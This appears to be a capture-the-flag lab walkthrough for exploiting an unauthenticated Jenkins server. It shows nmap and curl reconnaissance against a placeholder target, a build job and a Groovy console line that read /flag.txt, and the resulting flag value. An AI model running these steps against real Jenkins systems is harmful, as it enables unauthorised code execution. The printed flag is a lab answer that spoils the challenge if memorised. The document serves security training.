Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
nmap -Pn -sS -sV -p- <target-ip>nmap -Pn -sS -sV -p 80,8080 --script=http-title,http-headers <target-ip>curl -I http://<target-ip>:80curl http://<target-ip>:80curl -I http://<target-ip>:8080http://<target-ip>:8080cat /flag.txt, which will output the flag when the job is executedStarted by user anonymous
Building in workspace /var/jenkins_home/workspace/BuildMe
[BuildMe] $ /bin/sh -xe /tmp/jenkins1234567890.sh
+ cat /flag.txt
fe35b52a-165b-4067-8aaa-ddef7d068ed4
Finished: SUCCESSfe35b52a-165b-4067-8aaa-ddef7d068ed4curl http://<target-ip>:8080/flag.txtprintln new File('/flag.txt').textThis type of misconfiguration is commonly found in real-world environments and has led to numerous security breaches:
This challenge demonstrates a realistic attack scenario involving:
Choose how you want to get started
Choose a username to get started
We've sent a 9-character code to your email